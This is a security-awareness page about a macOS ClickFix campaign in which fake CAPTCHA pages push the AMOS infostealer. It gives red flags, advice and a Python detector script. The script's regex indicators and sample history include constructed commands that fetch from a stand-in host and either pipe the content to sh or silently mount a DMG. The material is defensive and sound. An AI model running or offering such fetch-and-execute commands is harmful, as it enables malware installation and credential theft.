TLDR
A new macOS ClickFix campaign tricks users into running malicious Terminal commands from a fake CAPTCHA page, silently downloading and mounting a DMG that installs the Atomic macOS Stealer (AMOS). The stealer harvests browser credentials,...
Red flags
- A website asks you to open Terminal and paste a command to "verify" yourself
- DMG files silently mount without appearing in Finder or on the desktop
- Fake System Settings prompts requesting your password right after running unknown commands
What to do
- Never paste commands into Terminal from web pages, even when they look like CAPTCHAs
- Keep macOS updated and run reputable endpoint protection
- Block unsigned DMG launches via MDM where possible
- Use a dedicated password manager and hardware wallet
- Revoke browser sessions and rotate credentials immediately if you executed such a command
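The red flag above is a pasted one-liner that fetches something from the web and then mounts a disk image without showing it in Finder. As an added example (not from the article or from BleepingComputer), this script scores shell-history or process-log lines for that combination; the sample lines and the `example.invalid` host are constructed, and the `-nobrowse` flag is the documented `hdiutil attach` option that hides a mounted image from Finder.

```python
import re

# Indicators of the ClickFix pattern described in the article. Each one on
# its own is routine admin activity; alert on the combination.
INDICATORS = (
    # fetch content from a remote host
    ("fetch", re.compile(r"\b(curl|wget)\b")),
    # hand downloaded content straight to a shell interpreter
    ("pipe_to_shell", re.compile(r"\|\s*(ba|z)?sh\b")),
    # mount a DMG without it appearing in Finder or on the desktop
    ("hidden_mount", re.compile(r"\bhdiutil\s+attach\b.*\s-nobrowse\b")),
)


def score_command(cmd):
    """Return the names of the indicators matched by one command line."""
    return [name for name, pattern in INDICATORS if pattern.search(cmd)]


def flag_clickfix(lines, threshold=2):
    """Return (line, indicators) for lines hitting at least `threshold` indicators.

    threshold=2 keeps a lone `curl` or a normal, visible `hdiutil attach`
    out of the results while catching fetch + hidden mount or fetch + pipe
    to shell in a single command.
    """
    flagged = []
    for line in lines:
        hits = score_command(line)
        if len(hits) >= threshold:
            flagged.append((line, hits))
    return flagged


# Constructed sample history: three normal commands and two ClickFix-style ones.
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "curl -O https://example.com/report.pdf",
    "hdiutil attach ~/Downloads/Installer.dmg",
    "curl -fsSL https://verify.example.invalid/c -o /tmp/.v.dmg && hdiutil attach -nobrowse /tmp/.v.dmg",
    "curl -fsSL https://verify.example.invalid/v | sh",
]

if __name__ == "__main__":
    for line, hits in flag_clickfix(SAMPLE_HISTORY):
        print(f"[{', '.join(hits)}] {line}")
```

Point it at `~/.zsh_history` or at the command field of your EDR's process-execution events; on a fleet, the `hidden_mount` indicator alone is rare enough to be worth a lower threshold.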
Source
bleepingcomputer
Source reviewed by Mythos Forensic Team
https://www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/
FAQ
Is New macOS ClickFix Attack Silently Mounts DMGs to Push AMOS Infostealer a real scam pattern?
Yes. Treat the message, call, or payment request as suspicious until you verify it through an official channel.
What are the first warning signs?
- A website asks you to open Terminal and paste a command to "verify" yourself
- DMG files silently mount without appearing in Finder or on the desktop
- Fake System Settings prompts requesting your password right after running unknown commands
What should I do first?
- Never paste commands into Terminal from web pages, even when they look like CAPTCHAs
- Keep macOS updated and run reputable endpoint protection
- Block unsigned DMG launches via MDM where possible
- Use a dedicated password manager and hardware wallet
- Revoke browser sessions and rotate credentials immediately if you executed such a command
Can LegalAudit check my case?
Yes. Start a free chat and paste the message, link, sender, or payment details for triage.